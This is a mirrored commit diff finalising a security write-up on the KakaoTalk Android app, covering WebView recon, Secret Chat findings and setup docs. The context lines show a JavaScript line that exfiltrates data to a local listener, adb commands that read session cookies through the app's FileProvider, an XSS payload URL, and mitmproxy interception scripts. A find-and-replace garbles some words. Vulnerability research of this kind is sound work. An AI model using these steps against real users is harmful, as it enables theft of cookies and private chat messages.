mirror of
https://github.com/stulle123/kakaotalk_analysis.git
synced 2024-11-26 15:32:15 +00:00
Finalize write-up
This commit is contained in:
parent
3c9880d142
commit
99ff6f8727
19
README.md
19
README.md
|
@ -2,18 +2,19 @@
|
|||
|
||||
## Setup
|
||||
|
||||
[My setup used to analyze the KakaoTalk Android app](SETUP.md).
|
||||
[My setup used to analyze the KakaoTalk Android app](./doc/SETUP.md).
|
||||
|
||||
## Recon
|
||||
|
||||
- [General recon notes](RECON.md).
|
||||
- [WebView recon](./recon/webview/WEBVIEW.md).
|
||||
|
||||
## Scripts
|
||||
|
||||
Frida and mitmproxy scripts are [here](./scripts/).
|
||||
- [General recon notes](./doc/RECON.md).
|
||||
- [WebView recon](./doc/WEBVIEW.md).
|
||||
|
||||
## Findings
|
||||
|
||||
- [Steal another user's chat messages](ACCOUNT_TAKEOVER.md)
|
||||
- [Secret Chat findings](SECRET_CHAT.md)
|
||||
- [Steal another user's chat messages](./doc/ACCOUNT_TAKEOVER.md)
|
||||
- [Secret Chat findings](./doc/SECRET_CHAT.md)
|
||||
|
||||
## Scripts
|
||||
|
||||
- Frida and mitmproxy scripts are in [here](./scripts/).
|
||||
- [How to run the mitmproxy scripts](./scripts/mitmproxy/README.md)
|
|
@ -18,7 +18,7 @@
|
|||
|
||||
> Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
|
||||
|
||||
> There are a lot of **TO-DO's** in this document where one can try to dig deeper.
|
||||
> There are a lot of **TODO's** in this document where one can try to dig deeper.
|
||||
|
||||
## General App Infos
|
||||
|
||||
|
@ -86,7 +86,7 @@ zzng.xml
|
|||
|
||||
Some values (e.g., OAuth tokens) in the Shared Preferences are encrypted with a static key which is derived from a hard-coded passphrase (can be found in class `SimpleCipher`).
|
||||
|
||||
**TO-DO**: Check Shared Prefs for sensitive information.
|
||||
**TODO**: Check Shared Prefs for sensitive information.
|
||||
|
||||
Trace Shared Prefs usage with this [Frida script](https://github.com/m0bilesecurity/Frida-Mobile-Scripts/blob/master/Android/shared_preferences_monitor.js). See [example trace](./recon/frida_trace_shared_prefs.log).
|
||||
|
||||
|
@ -105,13 +105,13 @@ multi_profile_database.db
|
|||
|
||||
One can decrypt the contents of `KakaoTalk.db` and `KakaoTalk2.db` with this [script](https://github.com/jiru/kakaodecrypt).
|
||||
|
||||
**TO-DO**: Find the password for the `crypto_database`. Hook `TrustStore` or `sqlite3_key` after a fresh app install and before login. Implementation in `com.kakao.talk.database.CryptoDatabase`.
|
||||
**TODO**: Find the password for the `crypto_database`. Hook `TrustStore` or `sqlite3_key` after a fresh app install and before login. Implementation in `com.kakao.talk.database.CryptoDatabase`.
|
||||
|
||||
## Rest APIs
|
||||
|
||||
Most endpoints are HTTPS protected. Certs in the `assets/sdk` folder are used for certification pinning (see class `com.kakao.i.http.g.b`).
|
||||
|
||||
Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TO-DO**: Add GET and POST requests. Use `sqlmap -r` to *fuzz* the Rest APIs.
|
||||
Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TODO**: Add GET and POST requests. Use `sqlmap -r` to *fuzz* the Rest APIs.
|
||||
|
||||
Interesting classes:
|
||||
```
|
||||
|
@ -138,19 +138,19 @@ Many many (exported) `BROWSABLE` Activities.
|
|||
|
||||
## Services
|
||||
|
||||
**TO-DO**
|
||||
**TODO**
|
||||
|
||||
## Content Providers
|
||||
|
||||
**TO-DO**
|
||||
**TODO**
|
||||
|
||||
## Broadcast Receivers
|
||||
|
||||
**TO-DO**
|
||||
**TODO**
|
||||
|
||||
## WebViews
|
||||
|
||||
See [here](./recon/webview/WEBVIEW.md).
|
||||
See [here](./WEBVIEW.md).
|
||||
|
||||
## Firebase
|
||||
|
||||
|
@ -193,7 +193,7 @@ $ curl "https://firebaseremoteconfig.googleapis.com/v1/projects/552367303137/nam
|
|||
|
||||
## Native Libs
|
||||
|
||||
**TO-DO**: Check for memory corruption bugs in native libs (located in `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64`):
|
||||
**TODO**: Check for memory corruption bugs in native libs (located in `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64`):
|
||||
|
||||
```bash
|
||||
libACExternalCore.so libc++_shared.so libopencv_java4.so
|
|
@ -41,12 +41,10 @@ Android implementation specifics:
|
|||
- Receiver's public keys in table `public_key_info` of `KakaoTalk.db` database
|
||||
- Shared secret stored in table `secret_key_info` of `KakaoTalk.db` database
|
||||
|
||||
TO-DOS:
|
||||
TODOS:
|
||||
|
||||
- Reinstall the app and check whether a warning shows up
|
||||
- Test CFB bit flipping
|
||||
- How are the msgId and chatId generated? -> nonce for CTR mode!
|
||||
|
||||
Demo:
|
||||
|
||||
![MITM](https://github.com/stulle123/kakaotalk_analysis/tree/main/scripts/mitmproxy/secret_chat_demo.gif?raw=true)
|
||||
![MITM](https://github.com/stulle123/kakaotalk_analysis/tree/main/doc/secret_chat_demo.gif?raw=true)
|
|
@ -53,7 +53,7 @@ Install required tools:
|
|||
|
||||
- Get latest [jadx](https://nightly.link/skylot/jadx/workflows/build-artifacts/master)
|
||||
- Get [Burp Suite](https://portswigger.net/burp/communitydownload)
|
||||
- Get [KakaoTalk for Windows/MacOS](https://www.kakaocorp.com/page/service/service/KakaoTalk?lang=en)
|
||||
- Get [KakaoTalk for MacOS](https://www.kakaocorp.com/page/service/service/KakaoTalk?lang=en)
|
||||
- `$ brew install apktool nuclei sqlite db-browser-for-sqlite`
|
||||
- `$ pip3 install --upgrade frida-tools mitmproxy`
|
||||
|
|
@ -1,7 +1,7 @@
|
|||
# WebView Recon
|
||||
|
||||
- [Low Severity Findings](#low-severity-findings)
|
||||
- [To-Dos / Digging](#to-dos--digging)
|
||||
- [TODOs / Digging](#TODOs--digging)
|
||||
- [Tokens / Cookies](#tokens--cookies)
|
||||
- [JavaScript Interfaces](#javascriptinterface)
|
||||
- [Redirect Endpoints](#redirect-endpoints)
|
||||
|
@ -20,7 +20,7 @@
|
|||
|
||||
> Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
|
||||
|
||||
> There are a lot of **TO-DO's** in this document where one can try to dig deeper.
|
||||
> There are a lot of **TODO's** in this document where one can try to dig deeper.
|
||||
|
||||
## Low Severity Findings
|
||||
|
||||
|
@ -113,14 +113,14 @@ img.src = 'http://10.0.2.2:8888?data=' + encodeURIComponent(data);
|
|||
- Reading a cookie: `adb shell content read --uri "content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627"`
|
||||
- Using the `android-app:` scheme: `adb shell am start "android-app://#Intent\;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity\;S.EXTRA_URL=content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627\;end"`
|
||||
- There are a couple of JavaScript interfaces that access the user's location (see [below](#javascriptinterface))
|
||||
- Auto-download to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)
|
||||
- AuTODOwnload to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)
|
||||
- I can access other `BROWSABLE` Activities or Apps via the `android-app:` scheme, e.g.:
|
||||
- `location.href = "android-app://com.google.android.googlequicksearchbox/https/www.google.com"`
|
||||
- `setWebContentsDebuggingEnabled` is enabled for most WebViews
|
||||
- XSS in `com.kakao.talk.activity.cscenter.CsCenterActivity` (search field)
|
||||
- https://cs.kakao.com/search?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E (you need to click into the search field to trigger the alert)
|
||||
|
||||
## To-Dos / Digging
|
||||
## TODOs / Digging
|
||||
|
||||
Things to try out / dig deeper.
|
||||
|
||||
|
@ -241,17 +241,17 @@ Maybe someone finds a XSS here:
|
|||
- `XMLHttpRequest` still won't work -> because it's not a `file://` URL?
|
||||
- Need to be able to create/download files in/to `Download` folder
|
||||
- Cannot steal files that cannot be rendered in a Webview (e.g., `LocalUser_DataStore.pref.preferences_pb` in `files` folder). Text files work fine: `content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json`.
|
||||
- `CommerceShopperWebViewActivity` doesn't auto-download but also doesn't render binary files
|
||||
- `CommerceShopperWebViewActivity` doesn't auTODOwnload but also doesn't render binary files
|
||||
|
||||
### DownloadListener.onDownloadStart
|
||||
|
||||
- Check `p21.e` / `DownloaderTask` class (`com.kakao.talk.widget.webview.WebViewHelper` -> `processDownload()` -> `C42792b.m9697b()` -> `DownloaderTask.m16277b()`)
|
||||
- **TO-DO**: Try path traversal
|
||||
- **TODO**: Try path traversal
|
||||
- Bypass `DownloaderTask` checks
|
||||
- Downloads files to `/sdcard/Download/` directory
|
||||
- Not able to overwrite files
|
||||
- Play with `data:` URIs (`data:[<mediatype>][;base64],<data>`)
|
||||
- **TO-DO:** I *might* be able to force WebViews to auto-download files by pointing them to an attacker-controlled website. Required headers:
|
||||
- **TODO:** I *might* be able to force WebViews to auTODOwnload files by pointing them to an attacker-controlled website. Required headers:
|
||||
- `Content-Type: application/octet-stream`
|
||||
- `content-disposition: attachment; filename=foo.html`
|
||||
- Investigate `com.kakao.talk.widget.webview.WebViewHelper` class:
|
Before Width: | Height: | Size: 1.3 MiB After Width: | Height: | Size: 1.3 MiB |
|
@ -1,21 +1,31 @@
|
|||
# MITM Kakaotalk LOCO Packets
|
||||
# mitmproxy Scripts
|
||||
|
||||
This is a simple script to man-in-the-middle LOCO packets with mitmproxy.
|
||||
There are four `mitmproxy` scripts in this directory to play with LOCO traffic:
|
||||
|
||||
Setup on your MITM host:
|
||||
- `flip_ciphertext_bits.py` -> a POC for showing the CFB malleability of encrypted LOCO packets
|
||||
- `replace_loco_message.py` -> Replace a LOCO message with another one to show missing integrity protection
|
||||
- `mitm_single_tls_host.py` -> MITM a single TLS host only. Passthrough all other TLS traffic.
|
||||
- `mitm_secret_chat.py` -> MITM end-to-end encrypted *SECRET CHAT* messages
|
||||
|
||||
To run the scripts, do the following:
|
||||
|
||||
1. Start mitmproxy script on your MITM host and copy the WireGuard config:
|
||||
|
||||
```bash
|
||||
$ python3 -m venv venv
|
||||
$ source venv/bin/activate
|
||||
(venv) $ python3 -m pip install mitmproxy bson cryptography
|
||||
(venv) $ mitmdump --mode wireguard --rawtcp -s loco_mitm.py
|
||||
(venv) $ mitmdump --mode wireguard --rawtcp -s replace_loco_message.py
|
||||
```
|
||||
|
||||
Android emulator setup:
|
||||
2. Android device/emulator setup:
|
||||
|
||||
- Install the Kakaotalk app if not done already
|
||||
- Install the WireGuard app
|
||||
- Change the IP address in mitmproxy's generated WireGuard config to `10.0.2.2`. Example:
|
||||
- Import mitmproxy's generated WireGuard config into the WireGuard app
|
||||
|
||||
If you run the Android Emulator on your MITM host, change the IP address to `10.0.2.2`. Example:
|
||||
|
||||
```
|
||||
[Interface]
|
||||
PrivateKey = MCCAFVMZQk+k+sbdXx0B4LG+Mij/UO7qyWa7IRqv/nA=
|
||||
|
@ -27,9 +37,8 @@ PublicKey = K+t/qiGO8tlA9L7wjAOb8wqjnu/NuthHgLs2gOCIDgY=
|
|||
AllowedIPs = 0.0.0.0/0
|
||||
Endpoint = 10.0.2.2:51820
|
||||
```
|
||||
- Import the config into the WireGuard app
|
||||
|
||||
Back on your MITM host start Frida (see [setup instructions](../../SETUP.md#setup-frida-to-disable-certificate-pinning)):
|
||||
3. Start Frida on MITM host (see [setup instructions](../../doc/SETUP.md#setup-frida-to-disable-certificate-pinning))
|
||||
|
||||
```bash
|
||||
# Start frida-server
|
||||
|
@ -39,7 +48,7 @@ $ adb root && adb shell /data/local/tmp/frida-server
|
|||
$ frida -U -l loco-tracer.js -f com.kakao.talk
|
||||
```
|
||||
|
||||
To run the unit tests:
|
||||
Optional: To run the unit tests for `mitm_secret_chat.py`:
|
||||
|
||||
- Install `pytest` and `pytest-datadir` via pip
|
||||
- Run the tests: `$ pytest tests/test_loco_parser.py`
|
Loading…
Reference in New Issue
Block a user